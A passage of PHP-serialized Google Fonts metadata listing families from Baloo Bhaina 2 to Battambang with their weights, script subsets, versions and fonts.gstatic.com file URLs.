2\";s:8:\"variants\";a:5:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";}s:7:\"subsets\";a:4:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:5:\"oriya\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":5:{s:7:\"regular\";s:102:\"http://fonts.gstatic.com/s/baloobhaina2/v20/qWc-B6yyq4P9Adr3RtoX1q6ySgbwusXwJjkOS-XEssPvRfRLYWmZSA.ttf\";s:3:\"500\";s:102:\"http://fonts.gstatic.com/s/baloobhaina2/v20/qWc-B6yyq4P9Adr3RtoX1q6ySgbwusXwJjkOS-XEgMPvRfRLYWmZSA.ttf\";s:3:\"600\";s:102:\"http://fonts.gstatic.com/s/baloobhaina2/v20/qWc-B6yyq4P9Adr3RtoX1q6ySgbwusXwJjkOS-XEbMTvRfRLYWmZSA.ttf\";s:3:\"700\";s:102:\"http://fonts.gstatic.com/s/baloobhaina2/v20/qWc-B6yyq4P9Adr3RtoX1q6ySgbwusXwJjkOS-XEVcTvRfRLYWmZSA.ttf\";s:3:\"800\";s:102:\"http://fonts.gstatic.com/s/baloobhaina2/v20/qWc-B6yyq4P9Adr3RtoX1q6ySgbwusXwJjkOS-XEMsTvRfRLYWmZSA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:131;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Baloo Chettan 2\";s:8:\"variants\";a:5:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";}s:7:\"subsets\";a:4:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:9:\"malayalam\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":5:{s:7:\"regular\";s:104:\"http://fonts.gstatic.com/s/baloochettan2/v14/vm8hdRbmXEva26PK-NtuX4ynWEzF69-L4gqgkIL5CeKTO1oeH9xI2gc.ttf\";s:3:\"500\";s:104:\"http://fonts.gstatic.com/s/baloochettan2/v14/vm8hdRbmXEva26PK-NtuX4ynWEzF69-L4gqgkIL5CdCTO1oeH9xI2gc.ttf\";s:3:\"600\";s:104:\"http://fonts.gstatic.com/s/baloochettan2/v14/vm8hdRbmXEva26PK-NtuX4ynWEzF69-L4gqgkIL5CTyUO1oeH9xI2gc.ttf\";s:3:\"700\";s:104:\"http://fonts.gstatic.com/s/baloochettan2/v14/vm8hdRbmXEva26PK-NtuX4ynWEzF69-L4gqgkIL5CQWUO1oeH9xI2gc.ttf\";s:3:\"800\";s:104:\"http://fonts.gstatic.com/s/baloochettan2/v14/vm8hdRbmXEva26PK-NtuX4ynWEzF69-L4gqgkIL5CWKUO1oeH9xI2gc.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:132;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Baloo Da 2\";s:8:\"variants\";a:5:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";}s:7:\"subsets\";a:4:{i:0;s:7:\"bengali\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":5:{s:7:\"regular\";s:92:\"http://fonts.gstatic.com/s/balooda2/v14/2-c39J9j0IaUMQZwAJyJaOX1UUnf3GLnYjALsTNe55aRa7UE.ttf\";s:3:\"500\";s:92:\"http://fonts.gstatic.com/s/balooda2/v14/2-c39J9j0IaUMQZwAJyJaOX1UUnf3GLnYjA5sTNe55aRa7UE.ttf\";s:3:\"600\";s:92:\"http://fonts.gstatic.com/s/balooda2/v14/2-c39J9j0IaUMQZwAJyJaOX1UUnf3GLnYjDVtjNe55aRa7UE.ttf\";s:3:\"700\";s:92:\"http://fonts.gstatic.com/s/balooda2/v14/2-c39J9j0IaUMQZwAJyJaOX1UUnf3GLnYjDstjNe55aRa7UE.ttf\";s:3:\"800\";s:92:\"http://fonts.gstatic.com/s/balooda2/v14/2-c39J9j0IaUMQZwAJyJaOX1UUnf3GLnYjCLtjNe55aRa7UE.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:133;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Baloo Paaji 2\";s:8:\"variants\";a:5:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";}s:7:\"subsets\";a:4:{i:0;s:8:\"gurmukhi\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":5:{s:7:\"regular\";s:99:\"http://fonts.gstatic.com/s/baloopaaji2/v20/i7dfIFFzbz-QHZUdV9_UGWZuelmy79QJ1HOSY9AX74fybRUz1r5t.ttf\";s:3:\"500\";s:99:\"http://fonts.gstatic.com/s/baloopaaji2/v20/i7dfIFFzbz-QHZUdV9_UGWZuelmy79QJ1HOSY9Al74fybRUz1r5t.ttf\";s:3:\"600\";s:99:\"http://fonts.gstatic.com/s/baloopaaji2/v20/i7dfIFFzbz-QHZUdV9_UGWZuelmy79QJ1HOSY9DJ6IfybRUz1r5t.ttf\";s:3:\"700\";s:99:\"http://fonts.gstatic.com/s/baloopaaji2/v20/i7dfIFFzbz-QHZUdV9_UGWZuelmy79QJ1HOSY9Dw6IfybRUz1r5t.ttf\";s:3:\"800\";s:99:\"http://fonts.gstatic.com/s/baloopaaji2/v20/i7dfIFFzbz-QHZUdV9_UGWZuelmy79QJ1HOSY9CX6IfybRUz1r5t.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:134;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Baloo Tamma 2\";s:8:\"variants\";a:5:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";}s:7:\"subsets\";a:4:{i:0;s:7:\"kannada\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":5:{s:7:\"regular\";s:99:\"http://fonts.gstatic.com/s/balootamma2/v13/vEFE2_hCAgcR46PaajtrYlBbVUMUJgIC5LHTrMscPp-0IF71SGC5.ttf\";s:3:\"500\";s:99:\"http://fonts.gstatic.com/s/balootamma2/v13/vEFE2_hCAgcR46PaajtrYlBbVUMUJgIC5LHTrMsuPp-0IF71SGC5.ttf\";s:3:\"600\";s:99:\"http://fonts.gstatic.com/s/balootamma2/v13/vEFE2_hCAgcR46PaajtrYlBbVUMUJgIC5LHTrMvCOZ-0IF71SGC5.ttf\";s:3:\"700\";s:99:\"http://fonts.gstatic.com/s/balootamma2/v13/vEFE2_hCAgcR46PaajtrYlBbVUMUJgIC5LHTrMv7OZ-0IF71SGC5.ttf\";s:3:\"800\";s:99:\"http://fonts.gstatic.com/s/balootamma2/v13/vEFE2_hCAgcR46PaajtrYlBbVUMUJgIC5LHTrMucOZ-0IF71SGC5.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:135;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Baloo Tammudu 2\";s:8:\"variants\";a:5:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";}s:7:\"subsets\";a:4:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:6:\"telugu\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":5:{s:7:\"regular\";s:104:\"http://fonts.gstatic.com/s/balootammudu2/v20/1Pt5g8TIS_SAmkLguUdFP8UaJcKkzlPmMT00GaE_Jf8e4c6PZSlGmAA.ttf\";s:3:\"500\";s:104:\"http://fonts.gstatic.com/s/balootammudu2/v20/1Pt5g8TIS_SAmkLguUdFP8UaJcKkzlPmMT00GaE_Jc0e4c6PZSlGmAA.ttf\";s:3:\"600\";s:104:\"http://fonts.gstatic.com/s/balootammudu2/v20/1Pt5g8TIS_SAmkLguUdFP8UaJcKkzlPmMT00GaE_JSEZ4c6PZSlGmAA.ttf\";s:3:\"700\";s:104:\"http://fonts.gstatic.com/s/balootammudu2/v20/1Pt5g8TIS_SAmkLguUdFP8UaJcKkzlPmMT00GaE_JRgZ4c6PZSlGmAA.ttf\";s:3:\"800\";s:104:\"http://fonts.gstatic.com/s/balootammudu2/v20/1Pt5g8TIS_SAmkLguUdFP8UaJcKkzlPmMT00GaE_JX8Z4c6PZSlGmAA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:136;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Baloo Thambi 2\";s:8:\"variants\";a:5:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";}s:7:\"subsets\";a:4:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:5:\"tamil\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":5:{s:7:\"regular\";s:102:\"http://fonts.gstatic.com/s/baloothambi2/v14/cY9RfjeOW0NHpmOQXranrbDyu5JMJmNp-aDvUBbKzcIzaQRG_n4osQ.ttf\";s:3:\"500\";s:102:\"http://fonts.gstatic.com/s/baloothambi2/v14/cY9RfjeOW0NHpmOQXranrbDyu5JMJmNp-aDvUBbK_8IzaQRG_n4osQ.ttf\";s:3:\"600\";s:102:\"http://fonts.gstatic.com/s/baloothambi2/v14/cY9RfjeOW0NHpmOQXranrbDyu5JMJmNp-aDvUBbKE8UzaQRG_n4osQ.ttf\";s:3:\"700\";s:102:\"http://fonts.gstatic.com/s/baloothambi2/v14/cY9RfjeOW0NHpmOQXranrbDyu5JMJmNp-aDvUBbKKsUzaQRG_n4osQ.ttf\";s:3:\"800\";s:102:\"http://fonts.gstatic.com/s/baloothambi2/v14/cY9RfjeOW0NHpmOQXranrbDyu5JMJmNp-aDvUBbKTcUzaQRG_n4osQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:137;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Balsamiq Sans\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/balsamiqsans/v10/P5sEzZiAbNrN8SB3lQQX7Pnc8dkdIYdNHzs.ttf\";s:6:\"italic\";s:86:\"http://fonts.gstatic.com/s/balsamiqsans/v10/P5sazZiAbNrN8SB3lQQX7PncwdsXJaVIDzvcXA.ttf\";s:3:\"700\";s:87:\"http://fonts.gstatic.com/s/balsamiqsans/v10/P5sZzZiAbNrN8SB3lQQX7PncyWUyBY9mAzLFRQI.ttf\";s:9:\"700italic\";s:90:\"http://fonts.gstatic.com/s/balsamiqsans/v10/P5sfzZiAbNrN8SB3lQQX7PncwdsvmYpsBxDAVQI4aA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:138;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Balthazar\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/balthazar/v17/d6lKkaajS8Gm4CVQjFEvyRTo39l8hw.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:139;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Bangers\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/bangers/v20/FeVQS0BTqb0h60ACL5la2bxii28.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:140;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Barlow\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:7:\"regular\";i:7;s:6:\"italic\";i:8;s:3:\"500\";i:9;s:9:\"500italic\";i:10;s:3:\"600\";i:11;s:9:\"600italic\";i:12;s:3:\"700\";i:13;s:9:\"700italic\";i:14;s:3:\"800\";i:15;s:9:\"800italic\";i:16;s:3:\"900\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:70:\"http://fonts.gstatic.com/s/barlow/v12/7cHrv4kjgoGqM7E3b8s8yn4hnCci.ttf\";s:9:\"100italic\";s:73:\"http://fonts.gstatic.com/s/barlow/v12/7cHtv4kjgoGqM7E_CfNYwHoDmTcibrA.ttf\";s:3:\"200\";s:72:\"http://fonts.gstatic.com/s/barlow/v12/7cHqv4kjgoGqM7E3w-oc4FAtlT47dw.ttf\";s:9:\"200italic\";s:74:\"http://fonts.gstatic.com/s/barlow/v12/7cHsv4kjgoGqM7E_CfP04Voptzsrd6m9.ttf\";s:3:\"300\";s:72:\"http://fonts.gstatic.com/s/barlow/v12/7cHqv4kjgoGqM7E3p-kc4FAtlT47dw.ttf\";s:9:\"300italic\";s:74:\"http://fonts.gstatic.com/s/barlow/v12/7cHsv4kjgoGqM7E_CfOQ4loptzsrd6m9.ttf\";s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/barlow/v12/7cHpv4kjgoGqM7EPC8E46HsxnA.ttf\";s:6:\"italic\";s:70:\"http://fonts.gstatic.com/s/barlow/v12/7cHrv4kjgoGqM7E_Ccs8yn4hnCci.ttf\";s:3:\"500\";s:72:\"http://fonts.gstatic.com/s/barlow/v12/7cHqv4kjgoGqM7E3_-gc4FAtlT47dw.ttf\";s:9:\"500italic\";s:74:\"http://fonts.gstatic.com/s/barlow/v12/7cHsv4kjgoGqM7E_CfPI41optzsrd6m9.ttf\";s:3:\"600\";s:72:\"http://fonts.gstatic.com/s/barlow/v12/7cHqv4kjgoGqM7E30-8c4FAtlT47dw.ttf\";s:9:\"600italic\";s:74:\"http://fonts.gstatic.com/s/barlow/v12/7cHsv4kjgoGqM7E_CfPk5Foptzsrd6m9.ttf\";s:3:\"700\";s:72:\"http://fonts.gstatic.com/s/barlow/v12/7cHqv4kjgoGqM7E3t-4c4FAtlT47dw.ttf\";s:9:\"700italic\";s:74:\"http://fonts.gstatic.com/s/barlow/v12/7cHsv4kjgoGqM7E_CfOA5Voptzsrd6m9.ttf\";s:3:\"800\";s:72:\"http://fonts.gstatic.com/s/barlow/v12/7cHqv4kjgoGqM7E3q-0c4FAtlT47dw.ttf\";s:9:\"800italic\";s:74:\"http://fonts.gstatic.com/s/barlow/v12/7cHsv4kjgoGqM7E_CfOc5loptzsrd6m9.ttf\";s:3:\"900\";s:72:\"http://fonts.gstatic.com/s/barlow/v12/7cHqv4kjgoGqM7E3j-wc4FAtlT47dw.ttf\";s:9:\"900italic\";s:74:\"http://fonts.gstatic.com/s/barlow/v12/7cHsv4kjgoGqM7E_CfO451optzsrd6m9.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:141;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Barlow Condensed\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:7:\"regular\";i:7;s:6:\"italic\";i:8;s:3:\"500\";i:9;s:9:\"500italic\";i:10;s:3:\"600\";i:11;s:9:\"600italic\";i:12;s:3:\"700\";i:13;s:9:\"700italic\";i:14;s:3:\"800\";i:15;s:9:\"800italic\";i:16;s:3:\"900\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:93:\"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxxL3I-JCGChYJ8VI-L6OO_au7B43LT31vytKgbaw.ttf\";s:9:\"100italic\";s:95:\"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxzL3I-JCGChYJ8VI-L6OO_au7B6xTru1H2lq0La6JN.ttf\";s:3:\"200\";s:94:\"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxwL3I-JCGChYJ8VI-L6OO_au7B497y_3HcuKECcrs.ttf\";s:9:\"200italic\";s:97:\"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxyL3I-JCGChYJ8VI-L6OO_au7B6xTrF3DWvIMHYrtUxg.ttf\";s:3:\"300\";s:94:\"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxwL3I-JCGChYJ8VI-L6OO_au7B47rx_3HcuKECcrs.ttf\";s:9:\"300italic\";s:97:\"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxyL3I-JCGChYJ8VI-L6OO_au7B6xTrc3PWvIMHYrtUxg.ttf\";s:7:\"regular\";s:90:\"http://fonts.gstatic.com/s/barlowcondensed/v12/HTx3L3I-JCGChYJ8VI-L6OO_au7B2xbZ23n3pKg.ttf\";s:6:\"italic\";s:93:\"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxxL3I-JCGChYJ8VI-L6OO_au7B6xTT31vytKgbaw.ttf\";s:3:\"500\";s:94:\"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxwL3I-JCGChYJ8VI-L6OO_au7B4-Lw_3HcuKECcrs.ttf\";s:9:\"500italic\";s:97:\"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxyL3I-JCGChYJ8VI-L6OO_au7B6xTrK3LWvIMHYrtUxg.ttf\";s:3:\"600\";s:94:\"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxwL3I-JCGChYJ8VI-L6OO_au7B4873_3HcuKECcrs.ttf\";s:9:\"600italic\";s:97:\"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxyL3I-JCGChYJ8VI-L6OO_au7B6xTrB3XWvIMHYrtUxg.ttf\";s:3:\"700\";s:94:\"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxwL3I-JCGChYJ8VI-L6OO_au7B46r2_3HcuKECcrs.ttf\";s:9:\"700italic\";s:97:\"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxyL3I-JCGChYJ8VI-L6OO_au7B6xTrY3TWvIMHYrtUxg.ttf\";s:3:\"800\";s:94:\"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxwL3I-JCGChYJ8VI-L6OO_au7B47b1_3HcuKECcrs.ttf\";s:9:\"800italic\";s:97:\"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxyL3I-JCGChYJ8VI-L6OO_au7B6xTrf3fWvIMHYrtUxg.ttf\";s:3:\"900\";s:94:\"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxwL3I-JCGChYJ8VI-L6OO_au7B45L0_3HcuKECcrs.ttf\";s:9:\"900italic\";s:97:\"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxyL3I-JCGChYJ8VI-L6OO_au7B6xTrW3bWvIMHYrtUxg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:142;O:8:\"stdClass\":8:{s:6:\"family\";s:21:\"Barlow Semi Condensed\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:7:\"regular\";i:7;s:6:\"italic\";i:8;s:3:\"500\";i:9;s:9:\"500italic\";i:10;s:3:\"600\";i:11;s:9:\"600italic\";i:12;s:3:\"700\";i:13;s:9:\"700italic\";i:14;s:3:\"800\";i:15;s:9:\"800italic\";i:16;s:3:\"900\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:103:\"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlphgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRfG4qvKk8ogoSP.ttf\";s:9:\"100italic\";s:106:\"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlpjgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRXfbLLIEsKh5SPZWs.ttf\";s:3:\"200\";s:105:\"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlpigxjLBV1hqnzfr-F8sEYMB0Yybp0mudRft6uPAGEki52WfA.ttf\";s:9:\"200italic\";s:107:\"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlpkgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRXfbJnAWsgqZiGfHK5.ttf\";s:3:\"300\";s:105:\"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlpigxjLBV1hqnzfr-F8sEYMB0Yybp0mudRf06iPAGEki52WfA.ttf\";s:9:\"300italic\";s:107:\"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlpkgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRXfbIDAmsgqZiGfHK5.ttf\";s:7:\"regular\";s:101:\"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlpvgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRnf4CrCEo4gg.ttf\";s:6:\"italic\";s:103:\"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlphgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRXfYqvKk8ogoSP.ttf\";s:3:\"500\";s:105:\"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlpigxjLBV1hqnzfr-F8sEYMB0Yybp0mudRfi6mPAGEki52WfA.ttf\";s:9:\"500italic\";s:107:\"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlpkgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRXfbJbA2sgqZiGfHK5.ttf\";s:3:\"600\";s:105:\"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlpigxjLBV1hqnzfr-F8sEYMB0Yybp0mudRfp66PAGEki52WfA.ttf\";s:9:\"600italic\";s:107:\"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlpkgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRXfbJ3BGsgqZiGfHK5.ttf\";s:3:\"700\";s:105:\"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlpigxjLBV1hqnzfr-F8sEYMB0Yybp0mudRfw6-PAGEki52WfA.ttf\";s:9:\"700italic\";s:107:\"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlpkgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRXfbITBWsgqZiGfHK5.ttf\";s:3:\"800\";s:105:\"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlpigxjLBV1hqnzfr-F8sEYMB0Yybp0mudRf36yPAGEki52WfA.ttf\";s:9:\"800italic\";s:107:\"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlpkgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRXfbIPBmsgqZiGfHK5.ttf\";s:3:\"900\";s:105:\"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlpigxjLBV1hqnzfr-F8sEYMB0Yybp0mudRf-62PAGEki52WfA.ttf\";s:9:\"900italic\";s:107:\"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlpkgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRXfbIrB2sgqZiGfHK5.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:143;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Barriecito\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:77:\"http://fonts.gstatic.com/s/barriecito/v17/WWXXlj-CbBOSLY2QTuY_KdUiYwTO0MU.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:144;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Barrio\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/barrio/v19/wEO8EBXBk8hBIDiEdQYhWdsX1Q.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:145;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Basic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/basic/v17/xfu_0WLxV2_XKQN34lDVyR7D.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:146;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Baskervville\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:82:\"http://fonts.gstatic.com/s/baskervville/v13/YA9Ur0yU4l_XOrogbkun3kQgt5OohvbJ9A.ttf\";s:6:\"italic\";s:84:\"http://fonts.gstatic.com/s/baskervville/v13/YA9Kr0yU4l_XOrogbkun3kQQtZmspPPZ9Mlt.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:147;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Battambang\";s:8:\"variants\";a:5:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"700\";i:4;s:3:\"900\";}s:7:\"subsets\";a:2:{i:0;s:5:\"khmer\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"100\";s:80:\"http://fonts.gstatic.com/s/battambang/v24/uk-kEGe7raEw-HjkzZabNhGp5w50_o9T7Q.ttf\";s:3:\"300\";s:81:\"http://fonts.gstatic.com/s/battambang/v24/uk-lEGe7raEw-HjkzZabNtmLxyRa8oZK9I0.ttf\";s:7:\"regular\";s:77:\"http://fonts.gstatic.com/s/battambang/v24/uk-mEGe7raEw-HjkzZabDnWj4yxx7o8.ttf\";s:3:\"700\";s:81:\"http://fonts.gstatic.com/s/battambang/v24/uk-lEGe7raEw-HjkzZabNsmMxyRa8oZK9I0.ttf\";s:3:\"900\";s:81:\"http://fonts.gstatic.com/s/battambang/v24/uk-lEGe7raEw-HjkzZabNvGOx